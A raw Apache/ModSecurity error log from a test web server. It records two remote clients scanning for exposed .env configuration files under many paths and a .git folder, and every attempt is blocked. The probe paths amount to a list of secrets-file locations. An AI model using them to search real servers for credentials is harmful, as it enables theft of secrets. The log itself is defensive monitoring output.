[Fri Nov 28 20:20:23.404143 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSn192av54iGRrCaHjosxQAAAAQ"]
[Fri Nov 28 20:20:23.640231 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSn192av54iGRrCaHjosxgAAAAQ"]
[Fri Nov 28 20:20:23.640465 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSn192av54iGRrCaHjosxgAAAAQ"]
[Fri Nov 28 20:20:23.641205 2025] [:error] [pid 390797] [client 3.150.136.243:53984] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSn192av54iGRrCaHjosxgAAAAQ"]
[Fri Nov 28 20:20:23.898667 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSn19-lfIsf8iBzToT1BNwAAABg"]
[Fri Nov 28 20:20:23.898908 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSn19-lfIsf8iBzToT1BNwAAABg"]
[Fri Nov 28 20:20:23.899109 2025] [:error] [pid 387638] [client 3.150.136.243:54214] [client 3.150.136.243] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSn19-lfIsf8iBzToT1BNwAAABg"]
[Fri Nov 28 21:10:07.543390 2025] [authz_core:error] [pid 391532] [client 3.23.113.253:38920] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Nov 28 21:10:07.543862 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSoBn-lfIsf8iBzToT1BOwAAABg"]
[Fri Nov 28 21:10:07.548356 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSoBn-lfIsf8iBzToT1BOwAAABg"]
[Fri Nov 28 21:10:07.544455 2025] [:error] [pid 391539] [client 3.23.113.253:38918] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSoBn00ytNsN5yZBlb_4LwAAABE"]
[Fri Nov 28 21:10:07.548566 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSoBn-lfIsf8iBzToT1BOwAAABg"]
[Fri Nov 28 21:10:07.548727 2025] [:error] [pid 391539] [client 3.23.113.253:38918] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSoBn00ytNsN5yZBlb_4LwAAABE"]
[Fri Nov 28 21:10:07.548872 2025] [:error] [pid 391539] [client 3.23.113.253:38918] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSoBn00ytNsN5yZBlb_4LwAAABE"]
[Fri Nov 28 21:10:08.062615 2025] [:error] [pid 391535] [client 3.23.113.253:38986] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSoBoDp6mGAaMCBhPPj62AAAAA0"]
[Fri Nov 28 21:10:08.062845 2025] [:error] [pid 391535] [client 3.23.113.253:38986] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSoBoDp6mGAaMCBhPPj62AAAAA0"]
[Fri Nov 28 21:10:08.062939 2025] [:error] [pid 391536] [client 3.23.113.253:38988] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSoBoE4qxyPu8hMP1aX-hAAAAA4"]
[Fri Nov 28 21:10:08.063030 2025] [:error] [pid 391535] [client 3.23.113.253:38986] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSoBoDp6mGAaMCBhPPj62AAAAA0"]
[Fri Nov 28 21:10:08.063190 2025] [:error] [pid 391536] [client 3.23.113.253:38988] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSoBoE4qxyPu8hMP1aX-hAAAAA4"]
[Fri Nov 28 21:10:08.063393 2025] [:error] [pid 391536] [client 3.23.113.253:38988] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSoBoE4qxyPu8hMP1aX-hAAAAA4"]
[Fri Nov 28 21:10:08.064515 2025] [:error] [pid 391534] [client 3.23.113.253:38990] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSoBoIXAn3U8Qs12Ils-RwAAAAw"]
[Fri Nov 28 21:10:08.064673 2025] [:error] [pid 391534] [client 3.23.113.253:38990] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSoBoIXAn3U8Qs12Ils-RwAAAAw"]
[Fri Nov 28 21:10:08.064828 2025] [:error] [pid 391534] [client 3.23.113.253:38990] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSoBoIXAn3U8Qs12Ils-RwAAAAw"]
[Fri Nov 28 21:10:09.497395 2025] [:error] [pid 393306] [client 3.23.113.253:39134] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSoBoY6N2QcUcCUvadUSLwAAAAA"]
[Fri Nov 28 21:10:09.497629 2025] [:error] [pid 393306] [client 3.23.113.253:39134] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSoBoY6N2QcUcCUvadUSLwAAAAA"]
[Fri Nov 28 21:10:09.497829 2025] [:error] [pid 393306] [client 3.23.113.253:39134] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSoBoY6N2QcUcCUvadUSLwAAAAA"]
[Fri Nov 28 21:10:09.499409 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSoBoa-Idoxz20B0R39VDQAAAAI"]
[Fri Nov 28 21:10:09.499600 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSoBoa-Idoxz20B0R39VDQAAAAI"]
[Fri Nov 28 21:10:09.499645 2025] [:error] [pid 393307] [client 3.23.113.253:39136] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSoBoWywcVl8n6SM7RtRcQAAAAE"]
[Fri Nov 28 21:10:09.499789 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSoBoa-Idoxz20B0R39VDQAAAAI"]
[Fri Nov 28 21:10:09.499807 2025] [:error] [pid 393307] [client 3.23.113.253:39136] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSoBoWywcVl8n6SM7RtRcQAAAAE"]
[Fri Nov 28 21:10:09.499985 2025] [:error] [pid 393307] [client 3.23.113.253:39136] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSoBoWywcVl8n6SM7RtRcQAAAAE"]
[Fri Nov 28 21:10:09.889360 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSoBoelfIsf8iBzToT1BPAAAABg"]
[Fri Nov 28 21:10:09.889687 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSoBoelfIsf8iBzToT1BPAAAABg"]
[Fri Nov 28 21:10:09.889928 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSoBoelfIsf8iBzToT1BPAAAABg"]
[Fri Nov 28 21:10:10.131721 2025] [:error] [pid 391541] [client 3.23.113.253:39304] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSoBoqsCtNc1QXFJ-Iu0zQAAABM"]
[Fri Nov 28 21:10:10.131939 2025] [:error] [pid 391541] [client 3.23.113.253:39304] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSoBoqsCtNc1QXFJ-Iu0zQAAABM"]
[Fri Nov 28 21:10:10.132118 2025] [:error] [pid 391541] [client 3.23.113.253:39304] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSoBoqsCtNc1QXFJ-Iu0zQAAABM"]
[Fri Nov 28 21:10:10.461347 2025] [:error] [pid 393564] [client 3.23.113.253:39506] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSoBovYNnvGL9CcvhgtWdAAAAAM"]
[Fri Nov 28 21:10:10.461609 2025] [:error] [pid 393564] [client 3.23.113.253:39506] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSoBovYNnvGL9CcvhgtWdAAAAAM"]
[Fri Nov 28 21:10:10.461821 2025] [:error] [pid 393564] [client 3.23.113.253:39506] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSoBovYNnvGL9CcvhgtWdAAAAAM"]
